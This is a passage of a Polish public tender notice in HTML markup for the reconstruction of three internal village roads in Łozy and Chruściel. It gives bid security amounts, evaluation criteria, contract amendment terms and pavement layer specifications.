              </b><div style="padding-left: 20px">1)Formularz ofertowy z wykorzystaniem wzoru - załącznik Nr 1 do SIWZ (oryginał). 2)Dowód wniesienia wadium. 3)Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom zamówienia  jeśli dotyczy - załącznik nr 6 do SIWZ 4)Pełnomocnictwo do reprezentowania Wykonawcy (jeżeli oferenta reprezentuje pełnomocnik  oryginał dokumentu lub kopia poświadczona notarialnie). 5)Pisemne zobowiązanie lub inny dokument podmiotów o oddaniu wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia - w przypadku, gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów (na zasadach określonych w art. 22a ustawy Pzp) - załącznik nr 9 do SIWZ. 6) Oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej - załącznik nr 4 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga wniesienia wadium w wysokości dla;
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
- 4 000,00 zł (słownie; cztery tysiące złotych).
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   Działka nr 242
- 3 000,00 zł (słownie; trzy tysiące złotych).
Część III - Przebudowa drogi wewnętrznej w miejscowości Chruściel - Działka nr 267/7  
- 4 000,00 zł (słownie; cztery tysiące złotych).
2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego(realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).
3. Wadium musi obejmować okres związania ofertą.
4. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości(t. j. Dz. U z 2016r. poz. 359).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy;Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 
84831300090050829020000030 z dopiskiem: 
Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
lub
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   Działka nr 242
lub
Część III-Przebudowa drogi wewnętrznej w miejscowości Chruściel - Działka nr 267/7  
Wadium wnoszone jest na każdą część oddzielnie
6. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art. 46 ustawy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji na wykonane roboty</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany umowy zgodnie z art. 144 ust 1 ustawy jeżeli konieczność ich wprowadzenia wyniknie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności; 1)w przypadku wystąpienia siły wyższej zmiana wymaga zgody obu stron umowy. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należyta starannością ogólnie przewidziana dla cywilnoprawnych stosunków zobowiązaniowych, 2)zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego, 3)terminu realizacji zamówienia, terminów dokonania poszczególnych czynności wskazanych w umowie, w następujących sytuacjach: a) w przypadku opóźnienia w rozpoczęciu lub realizacji robót budowlanych lub dostaw, odbiorach robót, uzyskaniu pozwolenia na użytkowanie, rozliczeniu Inwestycji - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy, b) w przypadku wystąpienia robót dodatkowych niezbędnych do wykonania Inwestycji, których realizacja wymaga zmiany terminu wykonania Inwestycji - o czas ich realizacji, c) zmian w dokumentacji projektowej mających wpływ na termin wykonania Inwestycji, 4) Zmiany osobowe: a) zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne osoby legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie prawo budowlane, b) zmiany podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot umowy na innego  dysponującego co najmniej porównywalnym doświadczeniem, potencjałem technicznym i osobowym. 5) Zmianie dotyczącej zakresu robót, wynagrodzenia. a)nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty, infrastrukturą towarzyszącą lub innymi uwarunkowaniami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń. b)okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia. W przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty zostanie zmienione w takim stosunku do umownego wynagrodzenia ryczałtowego, w jakim wykonane roboty budowlane pozostają do całości robót wyszczególnionych w łączącej strony umowie. Zmiana wartości ustalona zostanie kosztorysem różnicowym na podstawie cen zawartych w kosztorysie ofertowym. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Przebudowa drogi wewnętrznej w miejscowości Łozy<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Charakterystyka obiektu;
Przedmiotem zmówienia jest przebudowa drogi wewnętrznej przebiegającej łącznie na działkach 14/1 i 81znajdujących się w miejscowości Łozy. Odcinek drogi na działce nr 14/1 rozpoczyna się od skrzyżowania z Drogą Powiatową Nr 1342N (bez skrzyżowania) i biegnie w kierunku południowym do placu zabaw. Ponadto zakres przebudowy obejmuje również fragment drogi położony na działce nr 81.

Podstawowe wielkości powierzchni;
- nawierzchnia drogi wewnętrznej (w rzucie warstwy ścieralnej, łącznie odcinki wzmacniane i  
  poszerzane) - 1 963 m2,
- nawierzchnia zjazdów z betonowej kostki brukowej - 62 m2,
- nawierzchnia poboczy - 694 m2.

Przyjęte rozwiązania;
Klasa drogi po przebudowie - D (dojazdowa), prędkość projektowa Vp = 30 km/h, obciążenie ruchem KR1. Planowany zakres prac będzie obejmował wykonanie nawierzchni bitumicznej o parametrach jak dla drogi klasy D o szerokości 3,5 m z obustronnymi poboczami z kruszywa łamanego o szerokości minimum 0,75 m, a także wykonanie skrzyżowań z pozostałymi drogami oraz zjazdów z betonowej kostki brukowej.

Konstrukcje podstawowych nawierzchni;
Nawierzchnia jezdni w miejscu nakładki na istniejącym bruku:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- warstwa wyrównawcza z kruszywa łamanego stabilizowanego mechanicznie gr. min. 10 cm,
- istniejąca nawierzchnia brukowcowa,
- podłoże gruntowe.
Nawierzchnia jezdni w miejscu poszerzeń oraz na odcinkach nowej konstrukcji:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- podbudowa z kruszywa łamanego stabilizowanego mechanicznie gr. 10 cm,
- podbudowa pomocnicza z gruntu stabilizowanego cementem lub spoiwem hydraulicznym gr. 
  30 cm (z dowozu na poszerzeniach, wykonywana na miejscu na odcinkach nowej konstrukcji),
- podłoże gruntowe.
Nawierzchnia zjazdów:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 20 cm,
- warstwa mrozoochronna z pospółki gr. 20 cm,
- podłoże gruntowe.

Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel  Działka nr 242

Charakterystyka obiektu;
Przedmiotem zmówienia jest przebudowa drogi wewnętrznej na działce nr 242 położonej w miejscowości Chruściel. Zakres przebudowy obejmuje fragment od skrzyżowania z Drogą Wojewódzką Nr 506 (bez samego skrzyżowania) biegnący dalej za kościołem i zapewniający dojście do niego oraz budynku parafii.

Podstawowe wielkości powierzchni;
- nawierzchnia drogi wewnętrznej (w rzucie warstwy ścieralnej) - 567 m2,
- nawierzchnia chodników/dojść do posesji - 43 m2,
- nawierzchnia zjazdów z betonowej kostki brukowej - 36 m2,
- nawierzchnia poboczy - 133 m2
- długość krawężników - 348 m.

Przyjęte rozwiązania;
Klasa drogi po przebudowie - D (dojazdowa), prędkość projektowa Vp = 30 km/h, obciążenie ruchem KR1. Planowany zakres prac będzie obejmował wykonanie nowej konstrukcji nawierzchni bitumicznej w krawężnikach o parametrach jak dla drogi klasy D o szerokości 4,5 z obustronnymi poboczami z kruszywa łamanego o szerokości minimum 0,75 m, a także wykonanie skrzyżowań z pozostałymi drogami, zjazdów i dojść na posesje z betonowej kostki brukowej. Odwodnienie powierzchniowe, realizowane poprzez spadki podłużne i poprzeczne kierujące wodę na przyległy teren. Planowane jest również wykonanie oznakowania poziomego i pionowego w niezbędnym zakresie.

Konstrukcje nawierzchni
Nawierzchnia jezdni:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
- podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 30 cm,
- warstwa mrozoochronna z pospółki gr. 15 cm
- warstwa separacyjna z geotkaniny,
- podłoże gruntowe.
Nawierzchnia zjazdów:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 20 cm,
- warstwa mrozoochronna z pospółki gr. 20 cm
- podłoże gruntowe
Nawierzchnia chodników/dojść do posesji:
- warstwa ścieralna z betonowej kostki brukowej gr. 6 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 10 cm,
- warstwa mrozoochronna z pospółki gr. 10 cm
- podłoże gruntowe
Szczegółowy zakres robót określają dokumentacje techniczne, specyfikacje techniczne wykonania i odbioru robót i przedmiary robót.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7, 45233222-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji na wykonane roboty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1. Zamawiający wymaga wniesienia wadium w wysokości dla;
    Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
	- 4 000,00 zł (słownie; cztery tysiące złotych)
2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego(realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).
3. Wadium musi obejmować okres związania ofertą.
4. Wadium może być wniesione w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym
3) gwarancjach bankowych
4) gwarancjach ubezpieczeniowych
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości (t. j. Dz. U z 2016r. poz. 359).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy;   
    Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 
    84831300090050829020000030 z dopiskiem: 
    Część I - Przebudowa drogi wewnętrznej w miejscowości Łozy
6. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art. 46 ustawy.
<br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   Działka nr 242<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Charakterystyka obiektu;
Przedmiotem zmówienia jest przebudowa drogi wewnętrznej na działce nr 242 położonej w miejscowości Chruściel. Zakres przebudowy obejmuje fragment od skrzyżowania z Drogą Wojewódzką Nr 506 (bez samego skrzyżowania) biegnący dalej za kościołem i zapewniający dojście do niego oraz budynku parafii.

Podstawowe wielkości powierzchni;
- nawierzchnia drogi wewnętrznej (w rzucie warstwy ścieralnej) - 567 m2,
- nawierzchnia chodników/dojść do posesji - 43 m2,
- nawierzchnia zjazdów z betonowej kostki brukowej - 36 m2,
- nawierzchnia poboczy - 133 m2
- długość krawężników - 348 m.

Przyjęte rozwiązania;
Klasa drogi po przebudowie - D (dojazdowa), prędkość projektowa Vp = 30 km/h, obciążenie ruchem KR1. Planowany zakres prac będzie obejmował wykonanie nowej konstrukcji nawierzchni bitumicznej w krawężnikach o parametrach jak dla drogi klasy D o szerokości 4,5 z obustronnymi poboczami z kruszywa łamanego o szerokości minimum 0,75 m, a także wykonanie skrzyżowań z pozostałymi drogami, zjazdów i dojść na posesje z betonowej kostki brukowej. Odwodnienie powierzchniowe, realizowane poprzez spadki podłużne i poprzeczne kierujące wodę na przyległy teren. Planowane jest również wykonanie oznakowania poziomego i pionowego w niezbędnym zakresie.

Konstrukcje nawierzchni
Nawierzchnia jezdni:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
- podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 30 cm,
- warstwa mrozoochronna z pospółki gr. 15 cm
- warstwa separacyjna z geotkaniny,
- podłoże gruntowe.
Nawierzchnia zjazdów:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 20 cm,
- warstwa mrozoochronna z pospółki gr. 20 cm
- podłoże gruntowe
Nawierzchnia chodników/dojść do posesji:
- warstwa ścieralna z betonowej kostki brukowej gr. 6 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 10 cm,
- warstwa mrozoochronna z pospółki gr. 10 cm
- podłoże gruntowe.
Szczegółowy zakres robót określają dokumentacje techniczne, specyfikacje techniczne wykonania i odbioru robót i przedmiary robót.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7, 45233222-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/08/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin gwarancji na wykonane roboty</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b>1. Zamawiający wymaga wniesienia wadium w wysokości dla:
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   Działka nr 242
- 3 000,00 zł (słownie; trzy tysiące złotych)
2. Wadium uznaje się za wniesione w momencie uznania na rachunku Zamawiającego(realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).
3. Wadium musi obejmować okres związania ofertą.
4. Wadium może być wniesione w jednej lub kilku następujących formach:
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowe-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem kasowym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości(t. j. Dz. U z 2016r. poz. 359).
5. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy;   
    Braniewsko-Pasłęcki BS Oddział Braniewo Filia Płoskinia Nr 
    84831300090050829020000030 z dopiskiem: 
Część II - Przebudowa drogi wewnętrznej w miejscowości Chruściel   Działka nr 242
6. Zwrot oraz zatrzymanie wadium następuje zgodnie z zasadami opisanymi w art. 46 ustawy.
<br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Przebudowa drogi wewnętrznej w miejscowości Chruściel - Działka nr 267/7<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Charakterystyka obiektu;
Przedmiotem zmówienia jest przebudowa drogi wewnętrznej na działce nr 267/7 położonej w miejscowości Chruściel. Działka nr 267/7 i przebiegająca po niej droga wewnętrzna położona jest na byłym terenie kolejowym, w bezpośrednim sąsiedztwie stacji kolejowej. Zakres przebudowy obejmuje fragment o długości od skrzyżowania z Drogą Wojewódzką Nr 506 (bez samego skrzyżowania) do prostopadle przebiegającej drogi łączącej analizowany odcinek z drogą dojazdową do bocznicy kolejowej.

Podstawowe wielkości powierzchni;
- nawierzchnia drogi wewnętrznej (w rzucie warstwy ścieralnej) - 1 011 m2,
- nawierzchnia chodników/dojść do posesji - 100 m2,
- nawierzchnia zjazdów z betonowej kostki brukowej - 116 m2,
- długość krawężników - 643 m.

Przyjęte rozwiązania;
Klasa drogi po przebudowie - D (dojazdowa), prędkość projektowa Vp = 30 km/h, obciążenie ruchem KR1. Planowany zakres prac będzie obejmował wykonanie nowej konstrukcji nawierzchni bitumicznej w krawężnikach o parametrach jak dla drogi klasy D o szerokości
3,5 m z mijankami o szerokości 5,0 m w możliwych miejscach, a także wykonanie zjazdów i dojść na posesje z betonowej kostki brukowej. Odwodnienie głównie powierzchniowe, realizowane poprzez spadki podłużne i poprzeczne kierujące wodę na przyległy teren oraz do istniejących studni KD poprzez ścieki okrągłe. Planowane jest również wykonanie oznakowania poziomego i pionowego w niezbędnym zakresie.

Konstrukcje podstawowych nawierzchni
Nawierzchnia jezdni:
- warstwa ścieralna z betonu asfaltowego gr. 4 cm,
- warstwa wiążąca z betonu asfaltowego gr. 4 cm,
- podbudowa zasadnicza z kruszywa łamanego stabilizowanego mechanicznie gr. 20 cm,
- podbudowa pomocnicza z gruntu stabilizowanego cementem gr. 30 cm,
- warstwa mrozoochronna z pospółki gr. 15 cm
- warstwa separacyjna z geotkaniny,
- podłoże gruntowe.
Nawierzchnia zjazdów:
- warstwa ścieralna z betonowej kostki brukowej gr. 8 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 15 cm,
- warstwa mrozoochronna z pospółki gr. 15 cm
- podłoże gruntowe
Nawierzchnia chodników/dojść do posesji:
- warstwa ścieralna z betonowej kostki brukowej gr. 6 cm,
- podsypka cementowo-piaskowa gr. 3 cm,
- podbudowa zasadnicza z chudego betonu gr. 10 cm,
- warstwa mrozoochronna z pospółki gr. 10 cm
- podłoże gruntowe.
Szczegółowy zakres robót określają dokumentacje techniczne, specyfikacje techniczne wykonania i odbioru robót i przedmiary robót.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233220-7, 45233222-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
